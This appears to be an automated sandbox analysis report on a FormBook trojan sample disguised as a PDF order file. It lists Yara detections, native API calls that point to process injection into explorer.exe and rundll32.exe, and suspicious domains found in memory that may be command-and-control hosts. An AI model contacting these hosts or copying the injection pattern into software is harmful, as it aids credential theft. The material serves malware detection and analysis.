Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.run-run.tokyoReferer:
Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yzh478c.xyz
Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yzh478c.xyz/rn94/
Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yzh478c.xyz/rn94/www.hinet.tech
Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yzh478c.xyzReferer:
Source: explorer.exe, 00000006.00000000.2118388010.000000000C549000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4549228460.000000000C549000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000006.00000000.2109047338.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4543330536.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875781902.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000006.00000002.4545985269.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000006.00000002.4543330536.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2109047338.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000006.00000000.2105787269.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4541946347.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3097772705.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000006.00000002.4546921012.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876221001.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000006.00000003.3095307334.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4546983182.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875425211.0000000009C92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000006.00000002.4549228460.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2118388010.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000006.00000002.4545985269.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000006.00000002.4545985269.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.4551128208.000000000F01C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6508, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6644, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 1576, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: ORDER_1105-19-24-3537.pdf.exe
Source: initial sample	Static PE information: Filename: ORDER_1105-19-24-3537.pdf.exe

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041A350 NtCreateFile,	4_2_0041A350
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041A400 NtReadFile,	4_2_0041A400
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041A480 NtClose,	4_2_0041A480
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041A530 NtAllocateVirtualMemory,	4_2_0041A530
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041A34A NtCreateFile,	4_2_0041A34A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041A52A NtAllocateVirtualMemory,	4_2_0041A52A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182B60 NtClose,LdrInitializeThunk,	4_2_01182B60
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_01182BF0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182AD0 NtReadFile,LdrInitializeThunk,	4_2_01182AD0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_01182D10
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_01182D30
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182DD0 NtDelayExecution,LdrInitializeThunk,	4_2_01182DD0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01182DF0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_01182C70
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_01182CA0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182F30 NtCreateSection,LdrInitializeThunk,	4_2_01182F30
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182F90 NtProtectVirtualMemory,LdrInitializeThunk,	4_2_01182F90
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182FB0 NtResumeThread,LdrInitializeThunk,	4_2_01182FB0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182FE0 NtCreateFile,LdrInitializeThunk,	4_2_01182FE0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_01182E80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_01182EA0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01184340 NtSetContextThread,	4_2_01184340
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01184650 NtSuspendThread,	4_2_01184650
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182B80 NtQueryInformationFile,	4_2_01182B80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182BA0 NtEnumerateValueKey,	4_2_01182BA0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182BE0 NtQueryValueKey,	4_2_01182BE0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182AB0 NtWaitForSingleObject,	4_2_01182AB0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182AF0 NtWriteFile,	4_2_01182AF0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182D00 NtSetInformationFile,	4_2_01182D00
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182DB0 NtEnumerateKey,	4_2_01182DB0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182C00 NtQueryInformationProcess,	4_2_01182C00
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182C60 NtCreateKey,	4_2_01182C60
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182CC0 NtQueryVirtualMemory,	4_2_01182CC0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182CF0 NtOpenProcess,	4_2_01182CF0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182F60 NtCreateProcessEx,	4_2_01182F60
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182FA0 NtQuerySection,	4_2_01182FA0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182E30 NtWriteVirtualMemory,	4_2_01182E30
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182EE0 NtQueueApcThread,	4_2_01182EE0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01183010 NtOpenDirectoryObject,	4_2_01183010
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01183090 NtSetValueKey,	4_2_01183090
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011835C0 NtCreateMutant,	4_2_011835C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011839B0 NtGetContextThread,	4_2_011839B0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01183D10 NtOpenProcessToken,	4_2_01183D10
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01183D70 NtOpenThread,	4_2_01183D70
Source: C:\Windows\explorer.exe	Code function: 6_2_0F005E12 NtProtectVirtualMemory,	6_2_0F005E12
Source: C:\Windows\explorer.exe	Code function: 6_2_0F004232 NtCreateFile,	6_2_0F004232
Source: C:\Windows\explorer.exe	Code function: 6_2_0F005E0A NtProtectVirtualMemory,	6_2_0F005E0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00A040B1 NtQuerySystemInformation,	8_2_00A040B1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00A05CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,	8_2_00A05CF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00A04136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,	8_2_00A04136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00A05D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,	8_2_00A05D6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2CA0 NtQueryInformationToken,LdrInitializeThunk,	8_2_049A2CA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_049A2C70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2C60 NtCreateKey,LdrInitializeThunk,	8_2_049A2C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2DD0 NtDelayExecution,LdrInitializeThunk,	8_2_049A2DD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_049A2DF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2D10 NtMapViewOfSection,LdrInitializeThunk,	8_2_049A2D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_049A2EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2FE0 NtCreateFile,LdrInitializeThunk,	8_2_049A2FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2F30 NtCreateSection,LdrInitializeThunk,	8_2_049A2F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2AD0 NtReadFile,LdrInitializeThunk,	8_2_049A2AD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_049A2BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2BE0 NtQueryValueKey,LdrInitializeThunk,	8_2_049A2BE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2B60 NtClose,LdrInitializeThunk,	8_2_049A2B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A35C0 NtCreateMutant,LdrInitializeThunk,	8_2_049A35C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A4650 NtSuspendThread,	8_2_049A4650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A4340 NtSetContextThread,	8_2_049A4340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2CC0 NtQueryVirtualMemory,	8_2_049A2CC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2CF0 NtOpenProcess,	8_2_049A2CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2C00 NtQueryInformationProcess,	8_2_049A2C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2DB0 NtEnumerateKey,	8_2_049A2DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2D00 NtSetInformationFile,	8_2_049A2D00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2D30 NtUnmapViewOfSection,	8_2_049A2D30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2E80 NtReadVirtualMemory,	8_2_049A2E80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2EE0 NtQueueApcThread,	8_2_049A2EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2E30 NtWriteVirtualMemory,	8_2_049A2E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2F90 NtProtectVirtualMemory,	8_2_049A2F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2FB0 NtResumeThread,	8_2_049A2FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2FA0 NtQuerySection,	8_2_049A2FA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2F60 NtCreateProcessEx,	8_2_049A2F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2AB0 NtWaitForSingleObject,	8_2_049A2AB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2AF0 NtWriteFile,	8_2_049A2AF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2B80 NtQueryInformationFile,	8_2_049A2B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A2BA0 NtEnumerateValueKey,	8_2_049A2BA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A3090 NtSetValueKey,	8_2_049A3090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A3010 NtOpenDirectoryObject,	8_2_049A3010
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A3D10 NtOpenProcessToken,	8_2_049A3D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A3D70 NtOpenThread,	8_2_049A3D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A39B0 NtGetContextThread,	8_2_049A39B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AA350 NtCreateFile,	8_2_007AA350
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AA400 NtReadFile,	8_2_007AA400
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AA480 NtClose,	8_2_007AA480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AA530 NtAllocateVirtualMemory,	8_2_007AA530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AA34A NtCreateFile,	8_2_007AA34A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AA52A NtAllocateVirtualMemory,	8_2_007AA52A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047AA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	8_2_047AA036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047A9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	8_2_047A9BAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047AA042 NtQueryInformationProcess,	8_2_047AA042
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047A9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_047A9BB2

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 0_2_0107D5BC	0_2_0107D5BC
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 0_2_05276640	0_2_05276640
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 0_2_05276630	0_2_05276630
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 0_2_05270006	0_2_05270006
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 0_2_05270040	0_2_05270040
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 0_2_076149F8	0_2_076149F8
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 0_2_07610040	0_2_07610040
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 0_2_07610006	0_2_07610006
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_00401026	4_2_00401026
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041EC61	4_2_0041EC61
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_00402D89	4_2_00402D89
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041D593	4_2_0041D593
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041D596	4_2_0041D596
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_00409E50	4_2_00409E50
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EA118	4_2_011EA118
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01140100	4_2_01140100
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D8158	4_2_011D8158
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012041A2	4_2_012041A2
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012101AA	4_2_012101AA
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012081CC	4_2_012081CC
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E2000	4_2_011E2000
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120A352	4_2_0120A352
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012103E6	4_2_012103E6
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115E3F0	4_2_0115E3F0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D02C0	4_2_011D02C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150535	4_2_01150535
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01210591	4_2_01210591
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F4420	4_2_011F4420
